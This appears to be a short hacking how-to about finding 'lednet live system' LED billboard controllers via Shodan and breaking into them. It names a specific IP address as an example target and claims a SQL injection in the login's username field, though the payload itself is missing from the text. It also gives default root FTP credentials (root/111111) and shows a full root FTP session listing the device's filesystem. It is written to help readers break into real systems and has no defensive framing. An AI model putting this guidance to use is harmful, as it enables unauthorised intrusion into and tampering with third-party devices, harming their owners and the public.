Step 1. Register to shodan
Step 2. Look up: title:"lednet live system"
You'll find some!
Example: 186.206.188.175:8060/en/main.html
How to hack it? Well the Username Parameter is vulnerable to SQL Injection......
So to login, paste
in the username parameter and anything in the password input. Now click login!
Also another vulnerability is a default password vuln. You can basically get root ftp access to all of these billboards....
Username: root
Password: 111111
$ ftp 186.206.188.175
Connected to 186.206.188.175.
220 Welcome to blah FTP service.
Name (186.206.188.175): root
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd /
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||41314|).
150 Here comes the directory listing.
drwxr-xr-x 1 0 0 1464 Jan 01 1970 bin
lrwxrwxrwx 1 0 0 21 Jan 01 1970 c: -> /usr/local/playdata/c
lrwxrwxrwx 1 0 0 21 Jan 01 1970 d: -> /usr/local/playdata/d
drwxr-xr-x 7 0 0 0 May 21 18:08 dev
lrwxrwxrwx 1 0 0 21 Jan 01 1970 e: -> /usr/local/playdata/e
drwxr-xr-x 1 0 0 748 Jan 01 1970 etc
lrwxrwxrwx 1 0 0 21 Jan 01 1970 f: -> /usr/local/playdata/f
drwxr-xr-x 1 0 0 36 Jan 01 1970 home
drwxr-xr-x 1 0 0 1868 Jan 01 1970 lib
lrwxrwxrwx 1 0 0 11 Jan 01 1970 linuxrc -> bin/busybox
drwxr-xr-x 1 0 0 32 Jan 01 1970 mnt
drwxr-xr-x 1 0 0 0 Jan 01 1970 opt
dr-xr-xr-x 51 0 0 0 Jan 01 1970 proc
drwxr-xr-x 1 0 0 116 Jan 01 1970 root
drwxr-xr-x 1 0 0 1332 Jan 01 1970 sbin
drwxr-xr-x 12 0 0 0 Jan 01 1970 sys
drwxrwxrwt 6 0 0 720 May 21 18:16 tmp
drwxr-xr-x 1 0 0 108 Jan 01 1970 usr
drwxr-xr-x 3 0 0 672 Jan 01 1970 var
drwxr-xr-x 4 0 0 288 Jan 01 1970 www
226 Directory send OK.
ftp>